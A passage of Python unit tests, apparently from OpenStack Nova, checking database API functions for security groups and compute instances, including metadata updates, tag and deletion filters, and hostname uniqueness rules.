def test_security_group_get_by_project(self):
security_group1 = self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj1'})
security_group2 = self._create_security_group(
{'name': 'fake2', 'project_id': 'fake_proj2'})
real1 = db.security_group_get_by_project(
self.ctxt,
security_group1['project_id'])
real2 = db.security_group_get_by_project(
self.ctxt,
security_group2['project_id'])
expected1, expected2 = [security_group1], [security_group2]
self._assertEqualListsOfObjects(expected1, real1,
ignored_keys=['instances'])
self._assertEqualListsOfObjects(expected2, real2,
ignored_keys=['instances'])
def test_security_group_get_by_instance(self):
instance = db.instance_create(self.ctxt, dict(host='foo'))
values = [
{'name': 'fake1', 'instances': [instance]},
{'name': 'fake2', 'instances': [instance]},
{'name': 'fake3', 'instances': []},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = db.security_group_get_by_instance(self.ctxt,
instance['uuid'])
expected = security_groups[:2]
self._assertEqualListsOfObjects(expected, real,
ignored_keys=['instances'])
def test_security_group_get_all(self):
values = [
{'name': 'fake1', 'project_id': 'fake_proj1'},
{'name': 'fake2', 'project_id': 'fake_proj2'},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = db.security_group_get_all(self.ctxt)
self._assertEqualListsOfObjects(security_groups, real,
ignored_keys=['instances'])
def test_security_group_in_use(self):
instance = db.instance_create(self.ctxt, dict(host='foo'))
values = [
{'instances': [instance],
'name': 'fake_in_use'},
{'instances': []},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = []
for security_group in security_groups:
in_use = db.security_group_in_use(self.ctxt,
security_group['id'])
real.append(in_use)
expected = [True, False]
self.assertEqual(expected, real)
def test_security_group_ensure_default(self):
self.ctxt.project_id = 'fake'
self.ctxt.user_id = 'fake'
self.assertEqual(0, len(db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)))
db.security_group_ensure_default(self.ctxt)
security_groups = db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)
self.assertEqual(1, len(security_groups))
self.assertEqual("default", security_groups[0]["name"])
usage = db.quota_usage_get(self.ctxt,
self.ctxt.project_id,
'security_groups',
self.ctxt.user_id)
self.assertEqual(1, usage.in_use)
@mock.patch.object(db.sqlalchemy.api, '_security_group_get_by_names')
def test_security_group_ensure_default_called_concurrently(self, sg_mock):
        # make sure NotFound is always raised here to trick Nova into
        # inserting the duplicate security group entry
sg_mock.side_effect = exception.NotFound
# create the first db entry
self.ctxt.project_id = 1
db.security_group_ensure_default(self.ctxt)
security_groups = db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)
self.assertEqual(1, len(security_groups))
# create the second one and ensure the exception is handled properly
default_group = db.security_group_ensure_default(self.ctxt)
self.assertEqual('default', default_group.name)
def test_security_group_update(self):
security_group = self._create_security_group({})
new_values = {
'name': 'sec_group1',
'description': 'sec_group_descr1',
'user_id': 'fake_user1',
'project_id': 'fake_proj1',
}
updated_group = db.security_group_update(self.ctxt,
security_group['id'],
new_values,
columns_to_join=['rules.grantee_group'])
for key, value in new_values.items():
self.assertEqual(updated_group[key], value)
self.assertEqual(updated_group['rules'], [])
def test_security_group_update_to_duplicate(self):
self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj1'})
security_group2 = self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj2'})
self.assertRaises(exception.SecurityGroupExists,
db.security_group_update,
self.ctxt, security_group2['id'],
{'project_id': 'fake_proj1'})
class InstanceTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.instance_* methods."""
sample_data = {
'project_id': 'project1',
'hostname': 'example.com',
'host': 'h1',
'node': 'n1',
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'ckey': 'cvalue'},
}
def setUp(self):
super(InstanceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _assertEqualInstances(self, instance1, instance2):
self._assertEqualObjects(instance1, instance2,
ignored_keys=['metadata', 'system_metadata', 'info_cache',
'extra'])
def _assertEqualListsOfInstances(self, list1, list2):
self._assertEqualListsOfObjects(list1, list2,
ignored_keys=['metadata', 'system_metadata', 'info_cache',
'extra'])
def create_instance_with_args(self, **kwargs):
if 'context' in kwargs:
context = kwargs.pop('context')
else:
context = self.ctxt
args = self.sample_data.copy()
args.update(kwargs)
return db.instance_create(context, args)
def test_instance_create(self):
instance = self.create_instance_with_args()
self.assertTrue(uuidutils.is_uuid_like(instance['uuid']))
def test_instance_create_with_object_values(self):
values = {
'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1'),
}
dt_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at')
dt = timeutils.utcnow()
dt_utc = dt.replace(tzinfo=iso8601.iso8601.Utc())
for key in dt_keys:
values[key] = dt_utc
inst = db.instance_create(self.ctxt, values)
self.assertEqual(inst['access_ip_v4'], '1.2.3.4')
self.assertEqual(inst['access_ip_v6'], '::1')
for key in dt_keys:
self.assertEqual(inst[key], dt)
def test_instance_update_with_object_values(self):
values = {
'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1'),
}
dt_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at')
dt = timeutils.utcnow()
dt_utc = dt.replace(tzinfo=iso8601.iso8601.Utc())
for key in dt_keys:
values[key] = dt_utc
inst = db.instance_create(self.ctxt, {})
inst = db.instance_update(self.ctxt, inst['uuid'], values)
self.assertEqual(inst['access_ip_v4'], '1.2.3.4')
self.assertEqual(inst['access_ip_v6'], '::1')
for key in dt_keys:
self.assertEqual(inst[key], dt)
def test_instance_update_no_metadata_clobber(self):
meta = {'foo': 'bar'}
sys_meta = {'sfoo': 'sbar'}
values = {
'metadata': meta,
'system_metadata': sys_meta,
}
inst = db.instance_create(self.ctxt, {})
inst = db.instance_update(self.ctxt, inst['uuid'], values)
self.assertEqual(meta, utils.metadata_to_dict(inst['metadata']))
self.assertEqual(sys_meta,
utils.metadata_to_dict(inst['system_metadata']))
def test_instance_get_all_with_meta(self):
self.create_instance_with_args()
for inst in db.instance_get_all(self.ctxt):
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_update(self):
instance = self.create_instance_with_args()
metadata = {'host': 'bar', 'key2': 'wuff'}
system_metadata = {'original_image_ref': 'baz'}
# Update the metadata
db.instance_update(self.ctxt, instance['uuid'], {'metadata': metadata,
'system_metadata': system_metadata})
# Retrieve the user-provided metadata to ensure it was successfully
# updated
self.assertEqual(metadata,
db.instance_metadata_get(self.ctxt, instance['uuid']))
self.assertEqual(system_metadata,
db.instance_system_metadata_get(self.ctxt, instance['uuid']))
def test_instance_update_bad_str_dates(self):
instance = self.create_instance_with_args()
values = {'created_at': '123'}
self.assertRaises(ValueError,
db.instance_update,
self.ctxt, instance['uuid'], values)
def test_instance_update_good_str_dates(self):
instance = self.create_instance_with_args()
values = {'created_at': '2011-01-31T00:00:00.0'}
actual = db.instance_update(self.ctxt, instance['uuid'], values)
expected = datetime.datetime(2011, 1, 31)
self.assertEqual(expected, actual["created_at"])
def test_create_instance_unique_hostname(self):
context1 = context.RequestContext('user1', 'p1')
context2 = context.RequestContext('user2', 'p2')
self.create_instance_with_args(hostname='h1', project_id='p1')
# With scope 'global' any duplicate should fail, be it this project:
self.flags(osapi_compute_unique_server_name_scope='global')
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context1,
hostname='h1', project_id='p3')
# or another:
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context2,
hostname='h1', project_id='p2')
# With scope 'project' a duplicate in the project should fail:
self.flags(osapi_compute_unique_server_name_scope='project')
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context1,
hostname='h1', project_id='p1')
# With scope 'project' a duplicate in a different project should work:
self.flags(osapi_compute_unique_server_name_scope='project')
self.create_instance_with_args(context=context2, hostname='h2')
self.flags(osapi_compute_unique_server_name_scope=None)
@mock.patch('nova.db.sqlalchemy.api.undefer')
@mock.patch('nova.db.sqlalchemy.api.joinedload')
def test_instance_get_all_by_filters_extra_columns(self,
mock_joinedload,
mock_undefer):
db.instance_get_all_by_filters_sort(
self.ctxt, {},
columns_to_join=['info_cache', 'extra.pci_requests'])
mock_joinedload.assert_called_once_with('info_cache')
mock_undefer.assert_called_once_with('extra.pci_requests')
@mock.patch('nova.db.sqlalchemy.api.undefer')
@mock.patch('nova.db.sqlalchemy.api.joinedload')
def test_instance_get_active_by_window_extra_columns(self,
mock_joinedload,
mock_undefer):
now = datetime.datetime(2013, 10, 10, 17, 16, 37, 156701)
db.instance_get_active_by_window_joined(
self.ctxt, now,
columns_to_join=['info_cache', 'extra.pci_requests'])
mock_joinedload.assert_called_once_with('info_cache')
mock_undefer.assert_called_once_with('extra.pci_requests')
def test_instance_get_all_by_filters_with_meta(self):
self.create_instance_with_args()
for inst in db.instance_get_all_by_filters(self.ctxt, {}):
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_get_all_by_filters_without_meta(self):
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt, {},
columns_to_join=[])
for inst in result:
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_all_by_filters(self):
instances = [self.create_instance_with_args() for i in range(3)]
filtered_instances = db.instance_get_all_by_filters(self.ctxt, {})
self._assertEqualListsOfInstances(instances, filtered_instances)
def test_instance_get_all_by_filters_zero_limit(self):
self.create_instance_with_args()
instances = db.instance_get_all_by_filters(self.ctxt, {}, limit=0)
self.assertEqual([], instances)
def test_instance_metadata_get_multi(self):
uuids = [self.create_instance_with_args()['uuid'] for i in range(3)]
meta = sqlalchemy_api._instance_metadata_get_multi(self.ctxt, uuids)
for row in meta:
self.assertIn(row['instance_uuid'], uuids)
def test_instance_metadata_get_multi_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
sqlalchemy_api._instance_metadata_get_multi(self.ctxt, [])
def test_instance_system_system_metadata_get_multi(self):
uuids = [self.create_instance_with_args()['uuid'] for i in range(3)]
sys_meta = sqlalchemy_api._instance_system_metadata_get_multi(
self.ctxt, uuids)
for row in sys_meta:
self.assertIn(row['instance_uuid'], uuids)
def test_instance_system_metadata_get_multi_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
sqlalchemy_api._instance_system_metadata_get_multi(self.ctxt, [])
def test_instance_get_all_by_filters_regex(self):
i1 = self.create_instance_with_args(display_name='test1')
i2 = self.create_instance_with_args(display_name='teeeest2')
self.create_instance_with_args(display_name='diff')
result = db.instance_get_all_by_filters(self.ctxt,
{'display_name': 't.*st.'})
self._assertEqualListsOfInstances(result, [i1, i2])
def test_instance_get_all_by_filters_changes_since(self):
i1 = self.create_instance_with_args(updated_at=
'2013-12-05T15:03:25.000000')
i2 = self.create_instance_with_args(updated_at=
'2013-12-05T15:03:26.000000')
changes_since = iso8601.parse_date('2013-12-05T15:03:25.000000')
result = db.instance_get_all_by_filters(self.ctxt,
{'changes-since':
changes_since})
self._assertEqualListsOfInstances([i1, i2], result)
changes_since = iso8601.parse_date('2013-12-05T15:03:26.000000')
result = db.instance_get_all_by_filters(self.ctxt,
{'changes-since':
changes_since})
self._assertEqualListsOfInstances([i2], result)
def test_instance_get_all_by_filters_exact_match(self):
instance = self.create_instance_with_args(host='host1')
self.create_instance_with_args(host='host12')
result = db.instance_get_all_by_filters(self.ctxt,
{'host': 'host1'})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_metadata(self):
instance = self.create_instance_with_args(metadata={'foo': 'bar'})
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt,
{'metadata': {'foo': 'bar'}})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_system_metadata(self):
instance = self.create_instance_with_args(
system_metadata={'foo': 'bar'})
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_unicode_value(self):
instance = self.create_instance_with_args(display_name=u'test♥')
result = db.instance_get_all_by_filters(self.ctxt,
{'display_name': u'test'})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_tags(self):
instance = self.create_instance_with_args(
metadata={'foo': 'bar'})
self.create_instance_with_args()
# For format 'tag-'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-key', 'value': 'foo'},
{'name': 'tag-value', 'value': 'bar'},
]})
self._assertEqualListsOfInstances([instance], result)
# For format 'tag:'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'bar'},
]})
self._assertEqualListsOfInstances([instance], result)
# For non-existent tag
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'barred'},
]})
self.assertEqual([], result)
# Confirm with deleted tags
db.instance_metadata_delete(self.ctxt, instance['uuid'], 'foo')
# For format 'tag-'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-key', 'value': 'foo'},
]})
self.assertEqual([], result)
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-value', 'value': 'bar'}
]})
self.assertEqual([], result)
# For format 'tag:'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'bar'},
]})
self.assertEqual([], result)
def test_instance_get_by_uuid(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'])
self._assertEqualInstances(inst, result)
def test_instance_get_by_uuid_join_empty(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=[])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_by_uuid_join_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=['metadata'])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_by_uuid_join_sys_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=['system_metadata'])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_get_all_by_filters_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(reservation_id='b')
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt, {})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['metadata', 'system_metadata',
'deleted', 'deleted_at', 'info_cache',
'pci_devices', 'extra'])
def test_instance_get_all_by_filters_deleted_and_soft_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': True})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['metadata', 'system_metadata',
'deleted', 'deleted_at', 'info_cache',
'pci_devices', 'extra'])
def test_instance_get_all_by_filters_deleted_no_soft_deleted(self):
inst1 = self.create_instance_with_args()
self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': True,
'soft_deleted': False})
self._assertEqualListsOfObjects([inst1], result,
ignored_keys=['deleted', 'deleted_at', 'metadata',
'system_metadata', 'info_cache', 'pci_devices',
'extra'])
def test_instance_get_all_by_filters_alive_and_soft_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
inst3 = self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': False,
'soft_deleted': True})
self._assertEqualListsOfInstances([inst2, inst3], result)
def test_instance_get_all_by_filters_not_deleted(self):
inst1 = self.create_instance_with_args()
self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
inst3 = self.create_instance_with_args()
inst4 = self.create_instance_with_args(vm_state=vm_states.ACTIVE)
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': False})
self.assertIsNone(inst3.vm_state)
self._assertEqualListsOfInstances([inst3, inst4], result)
def test_instance_get_all_by_filters_cleaned(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(reservation_id='b')
db.instance_update(self.ctxt, inst1['uuid'], {'cleaned': 1})
result = db.instance_get_all_by_filters(self.ctxt, {})
self.assertEqual(2, len(result))
self.assertIn(inst1['uuid'], [result[0]['uuid'], result[1]['uuid']])
self.assertIn(inst2['uuid'], [result[0]['uuid'], result[1]['uuid']])
if inst1['uuid'] == result[0]['uuid']:
self.assertTrue(result[0]['cleaned'])
self.assertFalse(result[1]['cleaned'])
else:
self.assertTrue(result[1]['cleaned'])
self.assertFalse(result[0]['cleaned'])
def test_instance_get_all_by_filters_tag_any(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2, t3])
db.instance_tag_set(self.ctxt, inst3.uuid, [t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag-any': [t1, t2]})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_filters_tag_any_empty(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
t4 = 'tag4'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag-any': [t3, t4]})
self.assertEqual([], result)
def test_instance_get_all_by_filters_tag(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1, t3])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
db.instance_tag_set(self.ctxt, inst3.uuid, [t1, t2, t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t1, t2]})
self._assertEqualListsOfObjects([inst2, inst3], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_filters_tag_empty(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t3]})
self.assertEqual([], result)
def test_instance_get_all_by_filters_tag_any_and_tag(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
t4 = 'tag4'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1, t2])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2, t4])
db.instance_tag_set(self.ctxt, inst3.uuid, [t2, t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t1, t2],
'tag-any': [t3, t4]})
self._assertEqualListsOfObjects([inst2], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_host_and_node_no_join(self):
instance = self.create_instance_with_args()
result = db.instance_get_all_by_host_and_node(self.ctxt, 'h1', 'n1')
self.assertEqual(result[0]['uuid'], instance['uuid'])
self.assertEqual(result[0]['system_metadata'], [])
def test_instance_get_all_by_host_and_node(self):
instance = self.create_instance_with_args(
system_metadata={'foo': 'bar'})
result = db.instance_get_all_by_host_and_node(
self.ctxt, 'h1', 'n1',
columns_to_join=['system_metadata', 'extra'])
self.assertEqual(instance['uuid'], result[0]['uuid'])
self.assertEqual('bar', result[0]['system_metadata'][0]['value'])
self.assertEqual(instance['uuid'], result[0]['extra']['instance_uuid'])
@mock.patch('nova.db.sqlalchemy.api._instances_fill_metadata')
@mock.patch('nova.db.sqlalchemy.api._instance_get_all_query')
def test_instance_get_all_by_host_and_node_fills_manually(self,
mock_getall,
mock_fill):
db.instance_get_all_by_host_and_node(
self.ctxt, 'h1', 'n1',
columns_to_join=['metadata', 'system_metadata', 'extra', 'foo'])
self.assertEqual(sorted(['extra', 'foo']),
sorted(mock_getall.call_args[1]['joins']))
self.assertEqual(sorted(['metadata', 'system_metadata']),
sorted(mock_fill.call_args[1]['manual_joins']))
def test_instance_get_all_hung_in_rebooting(self):
# Ensure no instances are returned.
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self.assertEqual([], results)
# Ensure one rebooting instance with updated_at older than 10 seconds
# is returned.
instance = self.create_instance_with_args(task_state="rebooting",
updated_at=datetime.datetime(2000, 1, 1, 12, 0, 0))
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self._assertEqualListsOfObjects([instance], results,
ignored_keys=['task_state', 'info_cache', 'security_groups',
'metadata', 'system_metadata', 'pci_devices',
'extra'])
db.instance_update(self.ctxt, instance['uuid'], {"task_state": None})
# Ensure the newly rebooted instance is not returned.
self.create_instance_with_args(task_state="rebooting",
updated_at=timeutils.utcnow())
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self.assertEqual([], results)
def test_instance_update_with_expected_vm_state(self):
instance = self.create_instance_with_args(vm_state='foo')
db.instance_update(self.ctxt, instance['uuid'], {'host': 'h1',
'expected_vm_state': ('foo', 'bar')})
def test_instance_update_with_unexpected_vm_state(self):
instance = self.create_instance_with_args(vm_state='foo')
self.assertRaises(exception.UnexpectedVMStateError,
db.instance_update, self.ctxt, instance['uuid'],
{'host': 'h1', 'expected_vm_state': ('spam', 'bar')})
def test_instance_update_with_instance_uuid(self):
        # Test that instance_update() works when an instance UUID is passed.
ctxt = context.get_admin_context()
# Create an instance with some metadata
values = {'metadata': {'host': 'foo', 'key1': 'meow'},
'system_metadata': {'original_image_ref': 'blah'}}
instance = db.instance_create(ctxt, values)
# Update the metadata
values = {'metadata': {'host': 'bar', 'key2': 'wuff'},
'system_metadata': {'original_image_ref': 'baz'}}
db.instance_update(ctxt, instance['uuid'], values)
# Retrieve the user-provided metadata to ensure it was successfully
# updated
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
self.assertEqual('bar', instance_meta['host'])
self.assertEqual('wuff', instance_meta['key2'])
self.assertNotIn('key1', instance_meta)
# Retrieve the system metadata to ensure it was successfully updated
system_meta = db.instance_system_metadata_get(ctxt, instance['uuid'])
self.assertEqual('baz', system_meta['original_image_ref'])
def test_delete_instance_metadata_on_instance_destroy(self):
ctxt = context.get_admin_context()
# Create an instance with some metadata
values = {'metadata': {'host': 'foo', 'key1': 'meow'},
'system_metadata': {'original_image_ref': 'blah'}}
instance = db.instance_create(ctxt, values)
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
self.assertEqual('foo', instance_meta['host'])
self.assertEqual('meow', instance_meta['key1'])
db.instance_destroy(ctxt, instance['uuid'])
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
# Make sure instance metadata is deleted as well
self.assertEqual({}, instance_meta)
def test_delete_instance_faults_on_instance_destroy(self):
ctxt = context.get_admin_context()
uuid = str(stdlib_uuid.uuid4())
# Create faults
db.instance_create(ctxt, {'uuid': uuid})
fault_values = {
'message': 'message',
'details': 'detail',
'instance_uuid': uuid,
'code': 404,
'host': 'localhost'
}
fault = db.instance_fault_create(ctxt, fault_values)
# Retrieve the fault to ensure it was successfully added
faults = db.instance_fault_get_by_instance_uuids(ctxt, [uuid])
self.assertEqual(1, len(faults[uuid]))
self._assertEqualObjects(fault, faults[uuid][0])
db.instance_destroy(ctxt, uuid)
faults = db.instance_fault_get_by_instance_uuids(ctxt, [uuid])
        # Make sure the instance faults are deleted as well
self.assertEqual(0, len(faults[uuid]))
def test_instance_update_with_and_get_original(self):
instance = self.create_instance_with_args(vm_state='building')
(old_ref, new_ref) = db.instance_update_and_get_original(self.ctxt,
instance['uuid'], {'vm_state': 'needscoffee'})
self.assertEqual('building', old_ref['vm_state'])
self.assertEqual('needscoffee', new_ref['vm_state'])
def test_instance_update_and_get_original_metadata(self):
instance = self.create_instance_with_args()
columns_to_join = ['metadata']
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'vm_state': 'needscoffee'},
columns_to_join=columns_to_join)
meta = utils.metadata_to_dict(new_ref['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(new_ref['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_update_and_get_original_metadata_none_join(self):
instance = self.create_instance_with_args()
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'metadata': {'mk1': 'mv3'}})
meta = utils.metadata_to_dict(new_ref['metadata'])
self.assertEqual(meta, {'mk1': 'mv3'})
def test_instance_update_and_get_original_no_conflict_on_session(self):
session = get_session()
# patch get_session so that we may inspect it outside of the
# method; once enginefacade is implemented, this can be simplified
with mock.patch("nova.db.sqlalchemy.api.get_session", lambda: session):
instance = self.create_instance_with_args()
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'metadata': {'mk1': 'mv3'}})
# test some regular persisted fields
self.assertEqual(old_ref.uuid, new_ref.uuid)
self.assertEqual(old_ref.project_id, new_ref.project_id)
# after a copy operation, we can assert:
# 1. the two states have their own InstanceState
old_insp = inspect(old_ref)
new_insp = inspect(new_ref)
self.assertNotEqual(old_insp, new_insp)
# 2. only one of the objects is still in our Session
self.assertIs(new_insp.session, session)
self.assertIsNone(old_insp.session)
# 3. The "new" object remains persistent and ready
# for updates
self.assertTrue(new_insp.persistent)
# 4. the "old" object is detached from this Session.
self.assertTrue(old_insp.detached)
def test_instance_update_unique_name(self):
context1 = context.RequestContext('user1', 'p1')
context2 = context.RequestContext('user2', 'p2')
inst1 = self.create_instance_with_args(context=context1,
project_id='p1',
hostname='fake_name1')
inst2 = self.create_instance_with_args(context=context1,
project_id='p1',
hostname='fake_name2')
inst3 = self.create_instance_with_args(context=context2,
project_id='p2',
hostname='fake_name3')
# osapi_compute_unique_server_name_scope is unset so this should work:
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_name2'})
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_name1'})
# With scope 'global' any duplicate should fail.
self.flags(osapi_compute_unique_server_name_scope='global')
self.assertRaises(exception.InstanceExists,
db.instance_update,
context1,
inst2['uuid'],
{'hostname': 'fake_name1'})
self.assertRaises(exception.InstanceExists,
db.instance_update,
context2,
inst3['uuid'],
{'hostname': 'fake_name1'})
# But we should definitely be able to update our name if we aren't
# really changing it.
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_NAME'})
# With scope 'project' a duplicate in the project should fail:
self.flags(osapi_compute_unique_server_name_scope='project')
self.assertRaises(exception.InstanceExists, db.instance_update,
context1, inst2['uuid'], {'hostname': 'fake_NAME'})
# With scope 'project' a duplicate in a different project should work:
self.flags(osapi_compute_unique_server_name_scope='project')
db.instance_update(context2, inst3['uuid'], {'hostname': 'fake_NAME'})
def _test_instance_update_updates_metadata(self, metadata_type):
instance = self.create_instance_with_args()
def set_and_check(meta):
inst = db.instance_update(self.ctxt, instance['uuid'],
{metadata_type: dict(meta)})
_meta = utils.metadata_to_dict(inst[metadata_type])
self.assertEqual(meta, _meta)
meta = {'speed': '88', 'units': 'MPH'}
set_and_check(meta)
meta['gigawatts'] = '1.21'
set_and_check(meta)
del meta['gigawatts']
set_and_check(meta)
self.ctxt.read_deleted = 'yes'
self.assertNotIn('gigawatts',
db.instance_system_metadata_get(self.ctxt, instance.uuid))
def test_security_group_in_use(self):
db.instance_create(self.ctxt, dict(host='foo'))
def test_instance_update_updates_system_metadata(self):
# Ensure that system_metadata is updated during instance_update
self._test_instance_update_updates_metadata('system_metadata')
def test_instance_update_updates_metadata(self):
# Ensure that metadata is updated during instance_update
self._test_instance_update_updates_metadata('metadata')
def test_instance_floating_address_get_all(self):
ctxt = context.get_admin_context()
instance1 = db.instance_create(ctxt, {'host': 'h1', 'hostname': 'n1'})
instance2 = db.instance_create(ctxt, {'host': 'h2', 'hostname': 'n2'})
